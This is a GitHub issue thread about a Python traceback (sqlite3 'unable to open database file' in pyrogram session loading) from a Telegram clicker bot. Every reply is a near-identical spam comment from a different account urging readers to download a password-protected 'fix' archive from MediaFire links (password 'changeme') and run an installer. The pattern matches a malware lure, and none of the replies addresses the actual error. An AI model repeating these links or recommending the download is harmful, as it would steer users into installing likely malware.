### ISSUE TITLE
at Run clicker

### ISSUE THREAD

**Issue by gauravyad69** [GravelFire/MajorBot#6]
Enter the session name (press Enter to exit): cutiepie
Traceback (most recent call last):
  File "/home/gaurav2/TelegramBotsToDocker/Major/MajorBot/main.py", line 13, in <module>
    asyncio.run(main())
  File "/usr/lib/python3.10/asyncio/runners.py", line 44, in run
    return loop.run_until_complete(main)
  File "/usr/lib/python3.10/asyncio/base_events.py", line 649, in run_until_complete
    return future.result()
  File "/home/gaurav2/TelegramBotsToDocker/Major/MajorBot/main.py", line 8, in main
    await process()
  File "/home/gaurav2/TelegramBotsToDocker/Major/MajorBot/bot/utils/launcher.py", line 105, in process
    await register_sessions()
  File "/home/gaurav2/TelegramBotsToDocker/Major/MajorBot/bot/core/registrator.py", line 26, in register_sessions
    async with session:
  File "/home/gaurav2/.local/lib/python3.10/site-packages/pyrogram/client.py", line 311, in __aenter__
    return await self.start()
  File "/home/gaurav2/.local/lib/python3.10/site-packages/pyrogram/methods/utilities/start.py", line 58, in start
    is_authorized = await self.connect()
  File "/home/gaurav2/.local/lib/python3.10/site-packages/pyrogram/methods/auth/connect.py", line 40, in connect
    await self.load_session()
  File "/home/gaurav2/.local/lib/python3.10/site-packages/pyrogram/client.py", line 616, in load_session
    await self.storage.open()
  File "/home/gaurav2/.local/lib/python3.10/site-packages/pyrogram/storage/file_storage.py", line 58, in open
    self.conn = sqlite3.connect(str(path), timeout=1, check_same_thread=False)
sqlite3.OperationalError: unable to open database file

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
